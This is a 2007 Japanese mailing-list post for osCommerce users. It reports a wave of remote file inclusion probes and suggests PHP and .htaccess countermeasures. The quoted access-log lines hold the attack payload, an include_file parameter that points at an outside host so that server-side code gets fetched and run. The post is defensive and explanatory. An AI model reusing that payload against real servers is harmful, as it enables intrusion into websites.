OSDN -- 開發和下載開源軟體
繁體中文翻譯狀態 translation status for zh-tw

[Tep-j-general] include_once攻撃

Back to archive index

hamada bungu****@leo*****
2007年 10月 16日 (火) 16:59:39 JST 

こんにちわ。

なんか今日は

> 2007/10/16,14:46:16,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/default.php/cPath/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:17,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",403,811,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:18,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/default.php/cPath/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:18,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/default.php/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:22,209.31.123.186,"209.31.123.186.ptr.us.xo.net","-",GET,"/catalog/default.php/cPath/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.808"
> 2007/10/16,14:46:23,209.31.123.186,"209.31.123.186.ptr.us.xo.net","-",GET,"/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",403,822,"-","","libwww-perl/5.808"
> 2007/10/16,14:46:23,209.31.123.186,"209.31.123.186.ptr.us.xo.net","-",GET,"/catalog/default.php/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.808"

↑こんなのが大挙来襲してました。多IPから、一斉に。

osCにはinclude_once.phpなんてファイルがありませんのでこの攻撃は成功しま
せんが、default.phpやproduct_info.phpの引数として同時多発的に呼ばれた場
合爆発的なDB負荷となる可能性がありますんで、

> //リクエストに/images/やincludeが含まれてたら404
> if (ereg('/images/', $_SERVER['REQUEST_URI']) || ereg('include', $_SERVER['REQUEST_URI'])) {
> 
> 	header("HTTP/1.0 404 Not Found");
> 	exit;
> 
> }

↑こんなコードを埋め込んどく方が良いかもしれません。

当方は実際に埋め込んでたんで、ことごとく404を返してます。実際にはもう少
し汎用的な「防御プログラム」ですが。

osCを検索して/adminを覗こうとする人(?)も後を断たないので、当方は

/admin/.htaccess

> order deny,allow
> deny from all
> 
> allow from 122.22.**.**

みたいのをcronで自動生成してます。

自分トコ以外アクセス不可。絶対見せない。


はまだ

Tep-j-general メーリングリストの案内
Back to archive index